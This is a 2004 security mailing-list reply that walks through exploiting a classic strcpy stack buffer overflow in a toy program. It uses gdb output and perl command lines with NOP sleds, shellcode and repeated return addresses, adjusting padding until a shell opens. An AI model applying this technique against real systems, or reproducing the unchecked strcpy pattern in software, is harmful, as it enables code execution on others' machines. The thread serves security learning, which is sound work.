Security Basics mailing list archives
Re: Buffer Overflow problem
From: Krzysztof Godlewski <kgodlewski () interia pl>
Date: Fri, 7 May 2004 18:13:52 +0200
Dnia śro 5. maja 2004 08:14, John Vill napisał:
Hello Im new to this is list and I was hoping someone can help me. int main(int argv,char **argc) { char buf[256]; strcpy(buf,argc[1]); }
Hello, The problem is incorrect padding. I'll try explaining, but keep in mind that I'm very far from being an expert... On my system buf has addr 0xbffff4a0. When I run the prog like this: Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x222'``./mkshell.pl``perl -e 'print "\xa0\xf4\xff\xbf"'` I get: Program received signal SIGSEGV, Segmentation fault. 0x00bffff4 in ?? () So I'm just one byte off from the correct location. Examining the stack proves that this is true: (gdb) x/4x $esp - 8 0xbffff5a8: 0xa068732f 0x00bffff4 0x00000002 0xbffff5f4 (gdb) The value 0xa06873f2 just before the return addr holds the missing part of my buffer's address. So all you have to do is move the entire address by one byte. So... Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x223'``./mkshell.pl``perl -e 'print "\xa6\xf4\xff\xbf"'` sh-2.05b$ .. it works. A good idea is to write more than one return address on the stack, so you don't have to be so exact in calculating location. You just have to remember to jump somwhere inside the buffer. In my case, I changed the return address to 0xbffff4a9. Now: Starting program: /home/kg/prog/sec/buf `perl -e 'print "\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'` Program received signal SIGSEGV, Segmentation fault. 0xfff4a9bf in ?? () (gdb) You can see there's my address on the stack, it's just incorrectly aligned. We can fix this by adding 1 to 3 bytes of padding: Starting program: /home/kg/prog/sec/buf AAA`perl -e 'print "\x90"x220'``./mkshell.pl``perl -e 'print "\xa9\xf4\xff\xbf"x30'` sh-2.05b$ This approach is more likely to work, as it leaves more room for mistake. I hope that helps. Krzysztof Godlewski --------------------------------------------------------------------------- Ethical Hacking at the InfoSec Institute. Mention this ad and get $545 off any course! All of our class sizes are guaranteed to be 10 students or less to facilitate one-on-one interaction with one of our expert instructors. Attend a course taught by an expert instructor with years of in-the-field pen testing experience in our state of the art hacking lab. Master the skills of an Ethical Hacker to better assess the security of your organization. Visit us at: http://www.infosecinstitute.com/courses/ethical_hacking_training.html ----------------------------------------------------------------------------
Current thread:
- Buffer Overflow problem John Vill (May 06)
- Re: Buffer Overflow problem Krzysztof Godlewski (May 07)
- <Possible follow-ups>
- RE: Buffer Overflow problem Steven Trewick (May 07)
- RE: Buffer Overflow problem Shaun Colley (May 10)
- Re: Buffer Overflow problem John Vill (May 10)
- Re: Buffer Overflow problem Krzysztof Godlewski (May 10)
- RE: Buffer Overflow problem John Vill (May 11)
- RE: Buffer Overflow problem JTH (May 12)